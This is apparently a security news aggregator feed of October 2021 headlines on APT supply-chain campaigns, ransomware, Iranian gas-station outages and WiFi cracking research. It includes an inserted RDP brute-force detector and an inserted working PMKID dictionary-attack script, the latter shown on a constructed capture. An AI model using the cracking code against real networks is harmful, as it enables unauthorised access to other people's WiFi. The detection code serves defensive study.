Fuji Electric Patches Vulnerabilities in Factory Monitoring Software Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday published an advisory to inform organizations about these flaws and the availability of fixes.Security Week
October 27, 2021 – APT
North Korea-linked Lazarus APT targets the IT supply chain Full Text
Abstract
North Korea-linked Lazarus APT group is extending its operations and started targeting the IT supply chain on new targets. North Korea-linked Lazarus APT group is now targeting also IT supply chain, researchers from Kaspersky Lab warns. The activity...Security Affairs
October 27, 2021 – Solution
Babuk ransomware decryptor released to recover files for free Full Text
Abstract
Czech cybersecurity software firm Avast has created and released a decryption tool to help Babuk ransomware victims recover their files for free.BleepingComputer
October 27, 2021 – Hacker
Attack the block – How a security researcher cracked 70% of urban WiFi networks in one hit Full Text
Abstract
A vulnerability, discovered by Hashcat’s lead developer Jens “atom” Steube, is at the heart of the attack. This bug can be exploited to retrieve PMKID hashes to crack network passwords.The Daily Swig
October 27, 2021 – Outage
Operations at Iranian gas stations were disrupted today. Cyber attack or computer glitch? Full Text
Abstract
A cyberattack has disrupted gas stations from the National Iranian Oil Products Distribution Company (NIOPDC) across Iran. A cyber attack has disrupted gas stations from the state-owned National Iranian Oil Products Distribution Company (NIOPDC) across...Security Affairs
October 27, 2021 – Government
US bans China Telecom Americas over national security risks Full Text
Abstract
The Federal Communications Commission (FCC) has revoked China Telecom Americas' license to provide telecommunication services within the United States.BleepingComputer
October 27, 2021 – Phishing
Watch out for the Steam skin “free knife” scam Full Text
Abstract
It’s a tactic designed to scam people in the fastest way imaginable. The scammer makes a minimal effort, they send a message to potential victims on Steam or on services such as Discord.Malwarebytes Labs
October 27, 2021 – Malware
Malicious NPM libraries install ransomware, password stealer Full Text
Abstract
Malicious NPM packages pretending to be Roblox libraries are delivering ransomware and password-stealing trojans on unsuspecting users.BleepingComputer
October 26, 2021 – Malware
SquirrelWaffle Loader Malspams, Packing Qakbot, Cobalt Strike Full Text
Abstract
Say hello to what could be the next big spam player: SquirrelWaffle, which is spreading with increasing frequency via spam campaigns and infecting systems with a new malware loader.Threatpost
October 26, 2021 – Outage
Iranian gas stations out of service after distribution network hacked Full Text
Abstract
Gas stations from the National Iranian Oil Products Distribution Company (NIOPDC) have stopped working today due to what appears to be a cyberattack that affected the entire distribution network.BleepingComputer
October 26, 2021 – Hacker
Gummy Browsers Attack Lets Hackers Spoof Your Digital Identity Full Text
Abstract
Researchers at Texas A&M University and the University of Florida discovered Gummy Browsers, a new fingerprint capturing and browser spoofing attack. This attack technique can be leveraged to bypass 2FA on auth systems. While security analysts and experts will work toward addressing such ... Read MoreCyware Alerts - Hacker News
October 26, 2021 – Government
Iran blames cyberattack for nationwide gas station closures Full Text
Abstract
Iran says that a cyberattack caused nationwide closures of gas stations, according to multiple reports.The Hill
October 26, 2021 – Phishing
Over 10 Million Android Users Targeted With Premium SMS Scam Apps Full Text
Abstract
A global fraud campaign has been found leveraging 151 malicious Android apps with 10.5 million downloads to rope users into premium subscription services without their consent and knowledge. The premium SMS scam campaign — dubbed " UltimaSMS " — is believed to have commenced in May 2021 and involved apps that cover a wide range of categories, including keyboards, QR code scanners, video and photo editors, spam call blockers, camera filters, and games, with most of the fraudulent apps downloaded by users in Egypt, Saudi Arabia, Pakistan, the U.A.E., Turkey, Oman, Qatar, Kuwait, the U.S., and Poland. Although a significant chunk of the apps in question have since been removed from the Google Play Store, 82 apps continued to remain available in the online marketplace as of October 19, 2021. It all starts with the apps prompting users to enter their phone numbers and email addresses to gain access to the advertised features, only to subscribe the victims to premium SMS servicThe Hacker News
October 26, 2021 – Government
After a Year of Silence, Are EU Cyber Sanctions Dead? Full Text
Abstract
The European Union has stopped issuing cyber sanctions, but it's not for lack of new attacks.Lawfare
October 26, 2021 – Criminals
Dark HunTOR: Police arrested 150 people in dark web drug bust Full Text
Abstract
Dark HunTOR: Police corps across the world have arrested 150 individuals suspected of buying or selling illicit goods on the dark web marketplace DarkMarket. A joint international operation, tracked as Dark HunTOR, conducted by law enforcement across...Security Affairs
October 26, 2021 – Education
Public Clouds & Shared Responsibility: Lessons from Vulnerability Disclosure Full Text
Abstract
Much is made of shared responsibility for cloud security. But Oliver Tavakoli, CTO at Vectra AI, notes there’s no guarantee that Azure or AWS are delivering services in a hardened and secure manner.Threatpost
October 26, 2021 – Malware
Spammers use Squirrelwaffle malware to drop Cobalt Strike Full Text
Abstract
A new malware threat named Squirrelwaffle has emerged in the wild, supporting actors with an initial foothold and a way to drop malware onto compromised systems and networks.BleepingComputer
October 26, 2021 – Malware
Magnitude EK Exploiting Chromium-based Browser Flaws Full Text
Abstract
After Internet Explorer, Magnitude Exploit Kit has been observed infecting Chromium-based browsers running on Windows OS in a series of attacks. It abuses two flaws: the first one is a remote code execution issue and the other is a privilege escalation bug. Researchers recommend ensuring timely pat ... Read MoreCyware Alerts - Hacker News
October 26, 2021 – Government
Lawmakers praise upcoming establishment of cyber bureau at State Full Text
Abstract
Lawmakers on both sides of the aisle are praising the upcoming establishment of a new cybersecurity bureau at the State Department, following years of advocacy and escalating global attacks.The Hill
October 26, 2021 – Malware
Malicious Firefox Add-ons Block Browser From Downloading Security Updates Full Text
Abstract
Mozilla on Monday disclosed it blocked two malicious Firefox add-ons installed by 455,000 users that were found misusing the Proxy API to impede downloading updates to the browser. The two extensions in question, named Bypass and Bypass XM, "interfered with Firefox in a way that prevented users who had installed them from downloading updates, accessing updated blocklists, and updating remotely configured content," Mozilla's Rachel Tublitz and Stuart Colville said . Because the Proxy API can be used to proxy web requests, abuse of the API can effectively give a bad actor control over how the Firefox browser connects to the internet. In addition to blocking the extensions to prevent installation by other users, Mozilla said it's pausing on approvals for new add-ons that use the proxy API until the fixes are broadly available. What's more, the California-based non-profit said it'd deployed a system add-on named " Proxy Failover " that shipsThe Hacker News
October 26, 2021 – Hacker
Expert managed to crack 70% of a 5,000 WiFi network sample in Tel Aviv Full Text
Abstract
A researcher from the security firm CyberArk has managed to crack 70% of Tel Aviv's WiFi networks, starting from a sample of 5,000 gathered WiFi networks. CyberArk security researcher Ido Hoorvitch demonstrated how it is possible to crack WiFi at scale by exploiting...Security Affairs
October 26, 2021 – General
Why the Next-Generation of Application Security Is Needed Full Text
Abstract
New software and code stand at the core of everything we do, but how well is all of this new code tested? Luckily, autonomous application security is here.Threatpost
October 26, 2021 – Malware
Brutal WordPress plugin bug allows subscribers to wipe sites Full Text
Abstract
A high severity security flaw found in a WordPress plugin with more than 8,000 active installs can let authenticated attackers reset and wipe vulnerable websites.BleepingComputer
October 26, 2021 – Ransomware
Ranzy Locker Ransomware Attacked Over 30 U.S. Organizations in 2021 Full Text
Abstract
The gang has been active since at least 2020 and has hit organizations from various industries. The attack vector most used by the ransomware operators is brute-force attempts against exposed RDP endpoints.Security Affairs
October 26, 2021 – Attack
Ranzy Locker ransomware hit tens of US companies in 2021 Full Text
Abstract
The FBI published a flash alert to warn of the activity of the Ranzy Locker ransomware that had already compromised tens of US companies. The FBI published a flash alert to warn of Ranzy Locker ransomware operations that had already compromised at least...Security Affairs
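The Ranzy Locker items above and the entry just before them both point at the same initial-access vector, brute-force attempts against RDP. The following detection logic is an added example (not from the FBI flash alert or either Security Affairs article) that runs over constructed Windows Security event records and flags three things a defender wants to see separately: a single account hammered from one source, many accounts tried from one source (a spray), and a success from a source that was just failing. The JSON shape of the records, the IP addresses (documentation ranges), the usernames and the thresholds are all assumptions chosen for the demo.

```python
"""Added example: flag RDP brute force and sprays from Windows Security logon events."""
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample, not real telemetry: a minimal JSON rendering of the fields a SIEM
# would carry for EventID 4625 (failed logon) and 4624 (successful logon).
# LogonType 10 = RemoteInteractive (RDP). With Network Level Authentication enabled,
# failed RDP attempts are commonly recorded as LogonType 3 (Network), so both are watched.
SAMPLE_EVENTS = [
    '{"time": "2021-10-25T02:00:00", "event_id": 4625, "logon_type": 10, "ip": "198.51.100.9", "user": "jdoe"}',
    '{"time": "2021-10-25T02:00:05", "event_id": 4625, "logon_type": 3, "ip": "203.0.113.7", "user": "administrator"}',
    '{"time": "2021-10-25T02:00:07", "event_id": 4625, "logon_type": 3, "ip": "203.0.113.7", "user": "administrator"}',
    '{"time": "2021-10-25T02:00:09", "event_id": 4625, "logon_type": 3, "ip": "203.0.113.7", "user": "administrator"}',
    '{"time": "2021-10-25T02:00:11", "event_id": 4625, "logon_type": 3, "ip": "203.0.113.7", "user": "administrator"}',
    '{"time": "2021-10-25T02:00:13", "event_id": 4625, "logon_type": 3, "ip": "203.0.113.7", "user": "administrator"}',
    '{"time": "2021-10-25T02:00:15", "event_id": 4625, "logon_type": 3, "ip": "203.0.113.7", "user": "administrator"}',
    '{"time": "2021-10-25T02:00:40", "event_id": 4624, "logon_type": 10, "ip": "203.0.113.7", "user": "administrator"}',
    '{"time": "2021-10-25T02:01:00", "event_id": 4625, "logon_type": 3, "ip": "192.0.2.55", "user": "alice"}',
    '{"time": "2021-10-25T02:01:02", "event_id": 4625, "logon_type": 3, "ip": "192.0.2.55", "user": "bob"}',
    '{"time": "2021-10-25T02:01:04", "event_id": 4625, "logon_type": 3, "ip": "192.0.2.55", "user": "carol"}',
    '{"time": "2021-10-25T02:01:06", "event_id": 4625, "logon_type": 3, "ip": "192.0.2.55", "user": "dave"}',
    '{"time": "2021-10-25T02:01:08", "event_id": 4625, "logon_type": 3, "ip": "192.0.2.55", "user": "erin"}',
    '{"time": "2021-10-25T02:05:00", "event_id": 4624, "logon_type": 10, "ip": "10.0.0.12", "user": "jdoe"}',
]


def detect_rdp_bruteforce(lines, threshold=5, window_minutes=5):
    """Sliding-window count of failed logons per source IP.

    Emits one alert per source when `threshold` failures land inside the window
    (classified as brute_force if one account was targeted, password_spray otherwise),
    and a high-fidelity success_after_failures alert if that source then logs on.
    """
    window = timedelta(minutes=window_minutes)
    failures = defaultdict(deque)   # ip -> deque of (timestamp, username) within the window
    alerted = set()
    alerts = []
    for line in lines:
        ev = json.loads(line)
        if ev["logon_type"] not in (3, 10):
            continue                 # interactive/console logons are out of scope here
        ts = datetime.fromisoformat(ev["time"])
        ip = ev["ip"]
        if ev["event_id"] == 4625:
            q = failures[ip]
            q.append((ts, ev["user"]))
            while q and ts - q[0][0] > window:
                q.popleft()          # drop failures that aged out of the window
            if len(q) >= threshold and ip not in alerted:
                alerted.add(ip)
                users = sorted({u for _, u in q})
                alerts.append({
                    "ip": ip,
                    "kind": "brute_force" if len(users) == 1 else "password_spray",
                    "failures": len(q),
                    "users": users,
                    "at": ev["time"],
                })
        elif ev["event_id"] == 4624 and ip in alerted:
            # A successful logon from a source that was just failing is the event worth paging on.
            alerts.append({"ip": ip, "kind": "success_after_failures", "user": ev["user"], "at": ev["time"]})
    return alerts


def demo():
    return detect_rdp_bruteforce(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

On real data, feed the function the 4625/4624 records in time order, keep the threshold low for internet-exposed hosts, and treat `success_after_failures` as the actionable signal: the first two alert kinds tell you someone is knocking, the third tells you they are in.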
October 26, 2021 – Privacy
Millions of Android Users Scammed in SMS Fraud Driven by Tik-Tok Ads Full Text
Abstract
UltimaSMS leverages at least 151 apps that have been downloaded collectively more than 10 million times, to extort money through a fake premium SMS subscription service.Threatpost
October 26, 2021 – Education
Prepare for 5 cybersecurity certifications with this bundle Full Text
Abstract
With The Ultimate 2021 Cyber Security Survival Training Bundle, you get full prep for five top certifications. The included content is worth a total of $495, but you can get it today for only $29.99.BleepingComputer
October 26, 2021 – Malware
SquirrelWaffle Malware Family Leverages Malspam Emails to Deliver Qakbot, Cobalt Strike Full Text
Abstract
It provides threat actors with an initial foothold that can be used to facilitate further compromise or other malware infections depending on how attackers choose to attempt to monetize their access.Cisco Talos
October 26, 2021 – Attack
UltimaSMS subscription fraud campaign targeted millions of Android users Full Text
Abstract
UltimaSMS, a massive fraud campaign, is using Android apps with millions of downloads to subscribe victims to premium subscription services. Researchers from Avast have uncovered a widespread premium SMS scam on the Google Play Store, tracked as UltimaSMS,...Security Affairs
October 26, 2021 – Hacker
North Korean state hackers start targeting the IT supply chain Full Text
Abstract
North Korean-sponsored Lazarus hacking group has switched focus on new targets and was observed by Kaspersky security researchers expanding its supply chain attack capabilities.BleepingComputer
October 26, 2021 – General
72% of organizations hit by DNS attacks in the past year Full Text
Abstract
According to a survey from the Neustar International Security Council (NISC) conducted in September 2021, 72% of study participants reported experiencing a DNS attack within the last 12 months.Help Net Security
October 26, 2021 – Policy and Law
Kansas Man pleads guilty to hacking the Post Rock Rural Water District Full Text
Abstract
Kansas man Wyatt Travnichek admitted in court to tampering with the computer systems at the Post Rock Rural Water District. Kansas man Wyatt A. Travnichek pleaded guilty to tampering with the computer system at a drinking water treatment facility...Security Affairs
October 26, 2021 – Hacker
Researcher cracked 70% of WiFi networks sampled in Tel Aviv Full Text
Abstract
A researcher has managed to crack 70% of a 5,000 WiFi network sample in his hometown, Tel Aviv, to prove that home networks are severely unsecured and easy to hijack.BleepingComputer
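The three Tel Aviv items (this one, the Security Affairs piece and The Daily Swig's "Attack the block") all rest on the same primitive: the PMKID the access point emits is a keyed hash over the PMK and the two MAC addresses, and for WPA2-PSK the PMK is derived from nothing but the passphrase and the SSID, so a captured PMKID can be attacked offline with no client handshake. The block below is an added example, not the researcher's code or hashcat's: it implements the two standard derivations (PBKDF2-HMAC-SHA1 for the PMK, HMAC-SHA1-128 over "PMK Name" || AP MAC || station MAC for the PMKID), parses a hashcat 22000-style PMKID record, and runs a dictionary attack against it. The SSID, MAC addresses, passphrase and wordlist are constructed for the demo; the capture line is built from those same values to stand in for what a capture tool would have recorded.

```python
"""Added example: PMKID derivation, 22000-record parsing and an offline dictionary attack."""
import hashlib
import hmac
from typing import Iterable, Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # IEEE 802.11: PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA), i.e. first 16 bytes.
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_22000_line(line: str) -> dict:
    # hashcat -m 22000 record: WPA*01*PMKID*APMAC*STAMAC*ESSIDHEX*** (type 01 = PMKID,
    # ANONCE/EAPOL/MESSAGEPAIR fields are empty for PMKID records).
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a PMKID (type 01) record")
    return {
        "pmkid": bytes.fromhex(fields[2]),
        "ap_mac": bytes.fromhex(fields[3]),
        "sta_mac": bytes.fromhex(fields[4]),
        "ssid": bytes.fromhex(fields[5]).decode("utf-8"),
    }


def crack_pmkid(record: dict, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose derived PMKID matches the captured one, else None."""
    for passphrase in candidates:
        if not 8 <= len(passphrase) <= 63:
            continue  # WPA-PSK passphrases are 8..63 characters; skip impossible ones before PBKDF2
        pmk = derive_pmk(passphrase, record["ssid"])
        if hmac.compare_digest(compute_pmkid(pmk, record["ap_mac"], record["sta_mac"]), record["pmkid"]):
            return passphrase
    return None


def make_22000_line(ssid: str, passphrase: str, ap_mac_hex: str, sta_mac_hex: str) -> str:
    # Builds a PMKID record the way a capture tool would emit it; used only to construct the sample.
    pmkid = compute_pmkid(derive_pmk(passphrase, ssid), bytes.fromhex(ap_mac_hex), bytes.fromhex(sta_mac_hex))
    return "*".join(["WPA", "01", pmkid.hex(), ap_mac_hex, sta_mac_hex, ssid.encode("utf-8").hex(), "", "", ""])


# Constructed sample network and wordlist (assumed values, not from the research).
SAMPLE_CAPTURE = make_22000_line("HomeNet-5G", "letmein123", "d8c7c8a1b2c3", "3c2ef9aabbcc")
WORDLIST = ["password", "12345678", "short", "letmein123", "qwertyuiop"]


def demo() -> Optional[str]:
    return crack_pmkid(parse_22000_line(SAMPLE_CAPTURE), WORDLIST)


if __name__ == "__main__":
    print(SAMPLE_CAPTURE)
    print("recovered passphrase:", demo())
```

Two things follow directly from the code. The per-candidate cost is one PBKDF2 run of 4096 iterations, which is exactly what a GPU cracker parallelises, so the only defence the network owner controls is the passphrase's entropy. And the PMKID is tied to the SSID, so a changed passphrase on the same SSID invalidates every candidate the attacker has already computed, while a common SSID lets precomputed PMK tables be reused across networks.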
October 26, 2021 – APT
APT trends report released for Q3 2021 Full Text
Abstract
While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering to target organizations or individuals, others refresh their toolsets and extend their scope.Kaspersky Labs
October 26, 2021 – Criminals
Police arrest 150 dark web vendors of illegal drugs and guns Full Text
Abstract
Law enforcement authorities arrested 150 suspects allegedly involved in selling and buying illicit goods on DarkMarket, the largest illegal marketplace on the dark web when it was taken down in January 2021.BleepingComputer
October 26, 2021 – Breach
Canadian Immigration Authority Leaked Some Vulnerable Afghan Citizens’ Details Full Text
Abstract
The names of several hundred vulnerable Afghans seeking refuge from the Taliban were recently leaked in emails sent in error by Immigration, Refugees and Citizenship Canada (IRCC), CBC News reported.CBC
October 26, 2021 – Criminals
Money launderers for Russian hacking groups arrested in Ukraine Full Text
Abstract
The Ukrainian cybercrime police force has arrested members of a group of money launderers and hackers at the request of U.S. intelligence services.BleepingComputer
October 26, 2021 – Business
Sonrai Security Announces $50M in Series C Funding Led by ISTARI Full Text
Abstract
Sonrai plans to use new funding to accelerate research and development and expand sales and marketing globally for the company’s industry-leading cloud security platform.Yahoo! Finance
October 26, 2021 – Government
FBI: Ranzy Locker ransomware hit at least 30 US companies this year Full Text
Abstract
The FBI said on Monday that Ranzy Locker ransomware operators had compromised at least 30 US companies this year from various industry sectors.BleepingComputer
October 26, 2021 – Outage
Suspected Cyberattack Temporarily Shuts Down Gas Stations Across Iran Full Text
Abstract
According to reports in local media and posts on social networks, the cyberattack caused NIOPDC gas stations to show the words "cyberattack 64411" on their screens earlier in the morning.The Record
October 26, 2021 – Privacy
Australia drafts Online Privacy Bill to bolster data security Full Text
Abstract
Australia's Attorney-General has submitted the first draft of a new Online Privacy Bill that contains striking reforms over existing privacy laws.BleepingComputer
October 25, 2021 – Education
Defending Assets You Don’t Know About, Against Cyberattacks Full Text
Abstract
No security defense is perfect, and shadow IT means no company can inventory every single asset that it has. David “moose” Wolpoff, CTO at Randori, discusses strategies for core asset protection given this reality.Threatpost
October 25, 2021 – Government
Groove Calls for Cyberattacks on US as REvil Payback Full Text
Abstract
The bold move signals a looming clash between Russian ransomware groups and the U.S.Threatpost
October 25, 2021 – Malware
Mozilla blocks malicious add-ons installed by 455K Firefox users Full Text
Abstract
Mozilla blocked malicious Firefox add-ons installed by roughly 455,000 users after discovering in early June that they were abusing the proxy API to block Firefox updates.BleepingComputer
October 25, 2021 – Breach
Microsoft Says SolarWinds Hackers Compromised 14 Technology Providers to Piggyback on Customer Access Full Text
Abstract
This time, Nobelium attacking a different part of the supply chain: resellers and other technology service providers that customize, deploy and manage various technologies for their customers.Microsoft
October 25, 2021 – Attack
New hacking efforts show Russia undeterred by US actions Full Text
Abstract
A year after Russian government hackers compromised almost a dozen U.S. federal agencies, renewed efforts by the same group to target the global IT supply chain are painting a picture of a defiant Russia undeterred by U.S. efforts to clamp down on malicious cyber activity.The Hill
October 25, 2021 – Vulnerabilities
New Attack Let Attacker Collect and Spoof Browser’s Digital Fingerprints Full Text
Abstract
A "potentially devastating and hard-to-detect threat" could be abused by attackers to collect users' browser fingerprinting information with the goal of spoofing the victims without their knowledge, thus effectively compromising their privacy. Academics from Texas A&M University dubbed the attack system " Gummy Browsers ," likening it to a nearly 20-year-old " Gummy Fingers " technique that can impersonate a user's fingerprint biometrics. "The idea is that the attacker 𝐴 first makes the user 𝑈 connect to his website (or to a well-known site the attacker controls) and transparently collects the information from 𝑈 that is used for fingerprinting purposes (just like any fingerprinting website 𝑊 collects this information)," the researchers outlined. "Then, 𝐴 orchestrates a browser on his own machine to replicate and transmit the same fingerprinting information when connecting to 𝑊, fooling 𝑊 to think that 𝑈 is the one reThe Hacker News
October 25, 2021 – Criminals
Unknown ransomware gang uses SQL injection bug in BillQuick Web Suite to deploy ransomware Full Text
Abstract
An unknown ransomware gang leverages a critical SQL injection flaw in the BillQuick Web Suite time and billing solution to deploy ransomware. An unknown ransomware gang is exploiting a critical SQL injection flaw, tracked as CVE-2021-42258, in the popular...Security Affairs
October 25, 2021 – Vulnerabilities
CISA Urges Sites to Patch Critical RCE in Discourse Full Text
Abstract
The patch, urgently rushed out on Friday, is an emergency fix for the widely deployed platform, whose No. 1 most trafficked site is Amazon’s Seller Central.Threatpost
October 25, 2021 – Attack
Millions of Android users targeted in subscription fraud campaign Full Text
Abstract
A new SMS scam campaign relying upon 151 apps has been uncovered, with many of these apps managing to find their way into the Play Store where they amassed 10.5 million downloads.BleepingComputer
October 25, 2021 – Government
US Intel Warns China Could Dominate Advanced Technologies Full Text
Abstract
The warnings include a renewed effort to inform business executives, academics and local and state government officials about the risks of accepting Chinese investment or expertise in key industries.Security Week
October 25, 2021 – Solution
Hardware-grade enterprise authentication without hardware: new SIM security solution for IAM Full Text
Abstract
The average cost of a data breach, according to the latest research by IBM, now stands at USD 4.24 million , the highest reported. The leading cause? Compromised credentials, often caused by human error. Although these findings continue to show an upward trend in the wrong direction, the challenge itself is not new. What is new is the unprecedented and accelerated complexity of securing the workplace. CISOs/CIOs are dealing with legacy systems, cloud hosting, on-prem, remote workers, office based, traditional software, and SaaS. How businesses adapted was laudable, but now that employees spread across locations, offices and homes – with more than half threatening not to return to offices unless hybrid working is implemented – the challenge morphs into securing a nonuniform perimeter. We know passwords aren't sufficient. Knowledge-based access is usually fortified with other forms of multi-factor authentication (MFA), such as auth apps or FIDO tokens, and in highly sensitive caseThe Hacker News
October 25, 2021 – Vulnerabilities
A critical RCE flaw affects Discourse software, patch it now! Full Text
Abstract
US CISA urges administrators to address a critical remote code execution flaw, tracked as CVE-2021-41163, in Discourse installs. Discourse is a popular open-source Internet forum and mailing list management software application. The US CISA published...Security Affairs
October 25, 2021 – APT
Microsoft Defender ATP adds live response for Linux and macOS Full Text
Abstract
Microsoft has announced the addition of new live macOS and Linux response capabilities to Defender for Endpoint, the enterprise version of Redmond's Windows 10 Defender antivirus.BleepingComputer
October 25, 2021 – Vulnerabilities
Researcher Earns $2 Million for Critical Vulnerability in Polygon Full Text
Abstract
A security researcher found a critical vulnerability in Polygon’s Plasma Bridge that could have allowed a malicious user to submit the same withdrawal transaction 224 times, with different exit IDs.Security Week
October 25, 2021 – Hacker
Microsoft Warns of Continued Supply-Chain Attacks by the Nobelium Hacker Group Full Text
Abstract
Nobelium, the threat actor behind the SolarWinds compromise in December 2020, has been behind a new wave of attacks that compromised 14 downstream customers of multiple cloud service providers (CSP), managed service providers (MSP), and other IT services organizations, illustrating the adversary's continuing interest in targeting the supply chain via the "compromise-one-to-compromise-many" approach. Microsoft, which disclosed details of the campaign on Monday, said it notified more than 140 resellers and technology service providers since May. Between July 1 and October 19, 2021, Nobelium is said to have singled out 609 customers, who were collectively attacked a grand total of 22,868 times. "This recent activity is another indicator that Russia is trying to gain long-term, systematic access to a variety of points in the technology supply chain and establish a mechanism for surveilling – now or in the future – targets of interest to the Russian government,"The Hacker News
October 25, 2021 – Vulnerabilities
Red TIM Research found two rare flaws in Ericsson OSS-RC component Full Text
Abstract
The Red Team Research (RTR), the bug research division of Italian telecommunications firm TIM, found two new vulnerabilities affecting the Ericsson OSS-RC. What is the OSS (Operations Support System)? The Operations Support System – Radio...Security Affairs
October 25, 2021 – Hacker
Hackers used billing software zero-day to deploy ransomware Full Text
Abstract
An unknown ransomware group is exploiting a critical SQL injection bug found in the BillQuick Web Suite time and billing solution to deploy ransomware on their targets' networks in ongoing attacks.BleepingComputer
October 25, 2021 – Vulnerabilities
Cisco SD-WAN flaw could lead to arbitrary code execution, patch it now! Full Text
Abstract
Cisco addressed a high-severity OS command-injection vulnerability, tracked as CVE-2021-1529, in Cisco SD-WAN that could allow privilege escalation and lead to arbitrary code execution.Security Affairs
October 25, 2021 – Hacker
Hackers Exploited Popular BillQuick Billing Software to Deploy Ransomware Full Text
Abstract
Cybersecurity researchers on Friday disclosed a now-patched critical vulnerability in multiple versions of a time and billing system called BillQuick that's being actively exploited by threat actors to deploy ransomware on vulnerable systems. CVE-2021-42258, as the flaw is tracked, concerns an SQL injection attack that allows for remote code execution and was successfully leveraged to gain initial access to an unnamed U.S. engineering company and mount a ransomware attack, American cybersecurity firm Huntress Labs said. While the issue has been addressed by BQE Software, eight other undisclosed security issues that were identified as part of the investigation are yet to be patched. According to its website, BQE Software's products are used by 400,000 users worldwide. "Hackers can use this to access customers' BillQuick data and run malicious commands on their on-premises Windows servers," Huntress Labs threat researcher Caleb Stewart saThe Hacker News
October 25, 2021 – APT
Russia-linked Nobelium APT targets orgs in the global IT supply chain Full Text
Abstract
Russia-linked Nobelium APT group has breached at least 14 managed service providers (MSPs) and cloud service providers since May 2021. The SolarWinds security breach was not isolated, Russia-linked Nobelium APT group has targeted 140 managed service...Security Affairs
October 25, 2021 – Government
CISA urges admins to patch critical Discourse code execution bug Full Text
Abstract
A critical Discourse remote code execution (RCE) vulnerability tracked as CVE-2021-41163 was fixed via an urgent update by the developer on Friday.BleepingComputer
October 25, 2021 – Solution
Facebook Introduces New Tool for Finding SSRF Vulnerabilities Full Text
Abstract
The new utility from Facebook features a simple interface that allows researchers to create unique internal endpoint URLs for targeting and then learn whether their URLs have been hit by an SSRF attempt.Security Week
October 25, 2021 – Privacy
NYT Journalist’s iPhone infected twice with NSO Group’s Pegasus spyware Full Text
Abstract
Threat actors infected the iPhone of New York Times journalist Ben Hubbard with NSO Group's Pegasus spyware between June 2018 and June 2021. The iPhone of New York Times journalist Ben Hubbard was repeatedly infected with NSO Group's Pegasus spyware....Security Affairs
October 25, 2021 – Criminals
Microsoft: Russian SVR hacked at least 14 IT supply chain firms since May Full Text
Abstract
Microsoft says the Russian-backed Nobelium threat group behind last year's SolarWinds hack is still targeting the global IT supply chain, with 140 resellers and technology service providers attacked and at least 14 breached since May 2021.BleepingComputer
October 25, 2021 – Criminals
Threat Actors Sell 50 Million Records of Moscow Drivers on Hacking Forum Full Text
Abstract
Threat actors are selling a database containing 50 million records of Moscow drivers on an underground forum for only $800. The data contains records collected between 2006 and 2019.Security Affairs
October 25, 2021 – Ransomware
Emsisoft created a free decryptor for past victims of the BlackMatter ransomware Full Text
Abstract
Experts from cybersecurity firm Emsisoft announced the availability of a free decryptor for past victims of the BlackMatter ransomware. Cybersecurity firm Emsisoft has released a free decryption tool for past victims of the BlackMatter ransomware....Security Affairs
October 24, 2021 – Attack
NYT Journalist Repeatedly Hacked with Pegasus after Reporting on Saudi Arabia Full Text
Abstract
The iPhone of New York Times journalist Ben Hubbard was repeatedly hacked with NSO Group's Pegasus spyware tool over a three-year period stretching between June 2018 and June 2021, resulting in infections twice in July 2020 and June 2021. The University of Toronto's Citizen Lab, which publicized the findings on Sunday, said the "targeting took place while he was reporting on Saudi Arabia, and writing a book about Saudi Crown Prince Mohammed bin Salman." The research institute did not attribute the infiltrations to a specific government. In a statement shared with Hubbard, the Israeli company denied its involvement in the hacks and dismissed the findings as "speculation," while noting that the journalist was not "a target of Pegasus by any of NSO's customers." To date, NSO Group is believed to have leveraged at least three different iOS exploits — namely an iMessage zero-click exploit in December 2019, a KISMET exploit targeting iOS 13The Hacker News
October 24, 2021 – Accident
BlackMatter ransomware victims quietly helped using secret decryptor Full Text
Abstract
Cybersecurity firm Emsisoft has been secretly decrypting BlackMatter ransomware victims since this summer, saving victims millions of dollars.BleepingComputer
October 24, 2021 – Phishing
Microsoft Most Imitated Brand for Phishing Attacks: Report Full Text
Abstract
Microsoft topped the list as 29% of all brand phishing attempts were related to the Redmond-based technology giant. Other impersonated brands include Amazon (13%), DHL (9%), and Best Buy (8%).Cyware Alerts - Hacker News
October 24, 2021 – Phishing
TodayZoo phishing kit borrows the code from other kits Full Text
Abstract
Microsoft uncovered an extensive series of credential phishing campaigns that employed a custom phishing kit tracked as TodayZoo. Microsoft researchers uncovered a custom phishing kit, dubbed TodayZoo, that was used in an extensive series of credential...Security Affairs
October 24, 2021 – Solution
Microsoft 365 will get support for custom ARC configurations Full Text
Abstract
Microsoft is working on adding custom Authenticated Received Chain (ARC) configuration support to Microsoft Defender for Office 365.BleepingComputer
October 24, 2021 – APT
Telecom Sector Comes Under Attack as New APT Groups Emerge Full Text
Abstract
A new China-linked LightBasin threat actor group emerged as a new threat for telecommunication companies as researchers dug out a string of attacks designed to gather valuable information.Cyware Alerts - Hacker News
October 24, 2021 – General
Security Affairs newsletter Round 337 Full Text
Abstract
A new round of the weekly Security Affairs newsletter has arrived! Every week the best security articles from Security Affairs, free for you in your email box. If you also want to receive the international press for free, subscribe here. NATO...Security Affairs
October 24, 2021 – Criminals
Ransomware Gangs Earned $590 Million in H1 2021 Full Text
Abstract
Almost $5.2 billion worth of outgoing Bitcoin transactions have been observed by FinCEN. This amount is possibly linked to the top 10 most reported ransomware strains.Cyware Alerts - Hacker News
October 24, 2021 – Government
NATO releases its first strategy for Artificial Intelligence Full Text
Abstract
This week, NATO Defence Ministers released the first-ever strategy for Artificial Intelligence (AI) that encourages the use of AI in a responsible manner. Artificial Intelligence (AI) is changing the global defence and security environment, for this...Security Affairs
October 24, 2021 – Attack
SmashEx Attack Reaches Most Secure Areas of Intel CPUs to Steal Data Full Text
Abstract
